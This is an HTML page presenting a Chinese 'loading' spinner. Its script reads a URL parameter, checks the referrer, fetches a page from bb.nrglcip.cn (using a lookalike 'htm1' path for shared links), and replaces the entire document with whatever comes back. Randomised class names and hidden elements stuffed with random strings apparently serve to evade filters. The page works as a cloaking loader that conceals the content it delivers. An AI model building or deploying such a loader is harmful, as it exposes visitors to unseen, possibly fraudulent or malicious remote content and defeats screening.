<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .mHwXg6k {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .mHwXg6k .zKhwRrGpX {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .mHwXg6k .content {
            line-height: 50px;
            text-align: center
        }

        .mHwXg6k .img {
            width: 100%
        }

        .mHwXg6k .XBPCcDIqZWt {
            text-align: center
        }

        .mHwXg6k .XBPCcDIqZWt span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .mHwXg6k .XBPCcDIqZWt span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .mHwXg6k .XBPCcDIqZWt span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .mHwXg6k .XBPCcDIqZWt span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .mHwXg6k .XBPCcDIqZWt span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .mHwXg6k .XBPCcDIqZWt span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .mHwXg6k .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function XWlbxN7KO3VJ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var BIsF6J = XWlbxN7KO3VJ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ BIsF6J +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ BIsF6J +".html?a=share";
		}
		
        AT2UmxZDb=url+"#"+new Date().getTime();
        AT2UmxZDb && function() {
            $.get(AT2UmxZDb, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<a  href='#' style='display:none'>PR2L69Az4LWP5Q9K3GcU3wh14r</a>
<ul style='display:none' >GykvG1Mx4UX6P6DuW145XcdVzsi7Wnchii7sc1njB1dYJvlEgdlzxL</ul>
<div style='display:none'>lDwuJPw6tqAwRCBZWb9i2SBhtHJle1o2pA8dSpiPrS49SXPthh0DzN7tR6AVuoW1yAqe4BibWk0PfcHqK</div><div class="mHwXg6k">
    <div class="zKhwRrGpX">
        <div class="XBPCcDIqZWt">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>M5ifij7Nh4BshNKea5xLyyEzs5aWvNyNMR96oAoHI5buB1s5QTGpPLPZX1jKJ7PS</p>
<p  style='display:none'>M5ifij7Nh4BshNKea5xLyyEzs5aWvNyNMR96oAoHI5buB1s5QTGpPLPZX1jKJ7PS</p>
<h1 style='display:none' >CLE0qJJLEmmZKxIOIYUKefCGSyFiAyNL4w3znU0hNyfOF6Q2JFk2dvzTr1OCyzUwVtGhF</h1>
<img  src='' style='display:none'></body>
</html>